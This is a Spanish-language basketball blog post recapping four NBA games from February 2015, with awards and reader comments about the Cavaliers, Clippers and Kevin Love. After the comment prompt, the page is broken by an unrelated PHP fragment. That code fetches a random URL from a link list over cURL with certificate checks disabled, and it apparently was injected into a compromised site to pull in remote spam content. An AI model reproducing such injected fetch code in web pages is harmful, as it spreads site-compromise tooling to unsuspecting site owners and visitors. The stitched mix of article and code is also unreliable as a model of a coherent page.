La crónica: Cavs terceros

06 de February de 2015 por TheDeerHunter

12 victorias consecutivas de los Cavs y ahora son los Raptors quienen los miran nerviosos por el retrovisor. Los Hornets ayudaron tumbando a Washington, quién lo hubiera dicho hace un par de meses. Palizones de Blazers a Suns (ay ay ay…) y Mavs a Kings. La noche del jueves dio para poco más.

lebron_lac

LA Clippers 94 – Cleveland Cavaliers 105

Gran cabreo de los visitantes por el arbitraje de la colegiada Lauren Holtkamp, aunque antes de esta noche los Clippers han liderado la liga en faltas técnicas en 3 ocasiones de 4 posibles y la otra quedaron segundos. Su rendimiento deportivo esta campaña es para estar nerviosos. Paul falló 10 de sus 14 lanzamientos, seguramente por culpa de la árbitro. Ya nadie critica a David Blatt en Cleveland. Los sistemas ofensivos son más variados que nunca y anoche 6 hombres se movieron en torno a las dobles figuras. Sólo Irving se desgastó más de 30 minutos en pista.

Phoenix Suns 87 – Portland Trai Blazers 108

Hoy el marca abrirá con un “Víctor Claver lidera la victoria de su equipo con 3 puntazos”. Excesivamente cómoda la victoria de los Blazers. 220º doble doble de LaMarcus, récord de la franquicia, en un bonito duelo con Markieff Morris. Batum fue esta vez el líder de anotación y McCollum ejerció de 6º hombre. Hornacek no encontró la manera de inquietar a la defensa rival con un Goran Dragic muy perdido.

Wizards 87 – Hornets 94

Contrasta el dulce momento de los Hornets con la crisis existencial que atraviesan los Wizards. Contrasta aún más el baño que le pegó Gerald Henderson a un Bradley Beal absolutamente inoperante antes de marcharse con problemas físicos. Recordemos que los Hornets tienen a Kemba Walker en el dique seco y a un Lance Stephenson al que no terminan de exprimir como segundo salario más alto de la plantilla. Gran trabajo de Steve Clifford habiendo tenido arrestos de dejarle como reserva y diseñando una de las mejores defensas de toda la liga. Aún deben remar mucho tras el pésimo comienzo.

Dallas Mavericks 101 – Sacramento Kings 78

Única victoria foránea de la jornada. Los Mavs, sin Rondo ni Dirk, lo vieron hecho desde antes del salto inicial. Buen partido de Ellis y Tyson Chandler. Los Kings son pura caricatura.

PREMIOS

MVP: LeBron James ha dado con la tecla para involucrar a todos. 23 puntos, 3 rebotes “sólo”… pero 9 asistencias. En cualquier caso el mejor de la jornada fue Gerald Henderson con sus 27 puntos en un desigual duelo contra Bradley Beal.

El rookie: Partido para olvidar de Nik Staukas.

La sorpresa: Un buen partido de la segunda unidad de los Blazers. A parte de un “inmenso y decisivo” Claver con sus 3 puntitos, muy bien la dupla CJ McCollum-Meyers Leonard, con Steve Blake aportando sólidos minutos. Echamos en falta más de Thomas Robinson y Will Barton. Da la sensación de que se puede sacar algo más de partido de ese banco.

La decepción: Terrible imagen la de los Kings y actuación muy difícil de digerir por parte de Bradley Beal. Por su lado, qué mal cae Chris Paul cuando las cosas no le salen como a él le gustaría.

El mayor esfuerzo en vano: Sin mucho mérito se lo lleva Cousins. Imagino que ya nadie pide para él el MVP.

TOP 10

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Fenomenal Cleveland,en su partido y en la conferencia aprovechando los bajones de Toronto y Washington que piden el parón del ASG a gritos para recargar pilas.No hubo partido en el Quicken Loans Arena,por más que se quejen de arbitraje,las técnicas llegaron como consecuencia del mal partido de los “clipperianos”.¿Soy el único loco que traspasaba a Chris Paul?Esta temporada moriría con lo que tienen,pero en verano me lo planteaba de forma clara,lograr 2 muy buenos jugadores por él,un PG y un SF,y quizás algo más metiendo a Crawford también,que se está convirtiendo en un mandarinero de cuidado.Los Clippers tienen que conseguir más jugadores de calidad que con lo que tienen no les da para ese asalto al título.

    Grande Claver,sin fallo en la victoria de los Blazers.

      Citar

  2. luismi_vallecas dice:
    #2

    Como ha mejorado Cleveland desde los traspasos. A JR se le ve centrado, con un Mozgov a un gran nivel y parece que incluso Love coge algo de cuerda después de su inicio horrible. El equipo que cada vez me da peor sensación son los Clippers, con un Paul al peor nivel que le recuerdo y la verdad es que eso se nota mucho en el equipo. También Crawford está bastante mal y la aportación del banquillo es bastante escasa

      Citar

  3. Azabel dice:
    #3

    un poco es lo bueno que son los nuevos jugadores de los cavs pero mucho mas es el tema de lo malo que eran los anteriores
    Waiters no puede atarle los zapatos ni a Smith ni a Shumpert y a los dos juntos menos
    Mientras que Mozgiv como ya he dicho encaja mucho mejor que anderson en la ofensiva del equipo

    q tema para el año que viene mozgov no? podrian retenerlo peor 5 millones pero tienen firmado a Anderson por 10, lograran encajar al brasileño en un trade?

      Citar

  4. Futurman dice:
    #4

    Mozgov cabe sin problemas, Shumpert es el que no se sabe si renovará… dependerá de lo que pida.

    Por fin los Cavs han encontrado un equilibrio en ataque, si os dais cuenta Irving y Love se reparten tiros a ratos, por rachas y Lebron tiene cabeza para decidir que es lo mejor en cada momento. Esto hace que Love pueda aportar puntos y que no se agoten mucho.

    Lo que más me gustó del partido de Love, fue que posteó a Grifin, que no es que sea pequeño precisamente; y le gano la partida genial.

      Citar

  5. Azabel dice:
    #5

    Futurman:
    Mozgov cabe sin problemas, Shumpert es el que no se sabe si renovará… dependerá de lo que pida.

    Por fin los Cavs han encontrado un equilibrio en ataque, si os dais cuenta Irving y Love se reparten tiros a ratos, por rachas y Lebron tiene cabeza para decidir que es lo mejor en cada momento. Esto hace que Love pueda aportar puntos y que no se agoten mucho.

    Lo que más me gustó del partido de Love, fue que posteó a Grifin, que no es que sea pequeño precisamente; y le gano la partida genial.

    independientemente del partido de ayer, lo de Love viene bastante deslucido aunque productivo, por momentos parece Steve Novak con la unica diferencia que baja rebotes
    todavia no lo veo siendo determinante y aunque sus numeros no son malos (este tio hace numero hasta sin jugar) no tiene una injerencia en el equipo relevante, como si la han tenido Irving en determinados juegos y Lebron bue SIEMPRE
    sigo viendo corto el juego interior, solo sale Thompson como recambio de los titulares, les falta otro tio alto, que haga minimanente lo que pude hacer Admunson, que les vendria de perlas un peleador asi
    En cuanto a la base suplente, me gustaria alguien mas fisico y mejor defensor de Dellavedova que pueda compartir minutos con Irving pasando a este a jugar muchos minutos de escolta
    en fin, dos fichajes como esos, y no veo un equipo mejor en el este al menos

      Citar

  6. Futurman dice:
    #6

    Toda la razón, en lo de los suplentes.

    Lo de Love… disiento contigo, es decir; está claro que hay una infrautilización de Love en ataque y eso pesa en que se fije la gente en su defensa; pero veo una tendencia en los últimos partidos que me invita a pensar que están compenetrándose mejor en ataque. Lebron e Irving siguen amasando mucha bola, pero Love tiene sus tiros abiertos, triples y recibe algo más al poste. Y se nota.

    Lo de ayer lo digo, por que frente a Griffin, que se supone un tío físico y fuerte; le postea muchas veces y con éxito.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>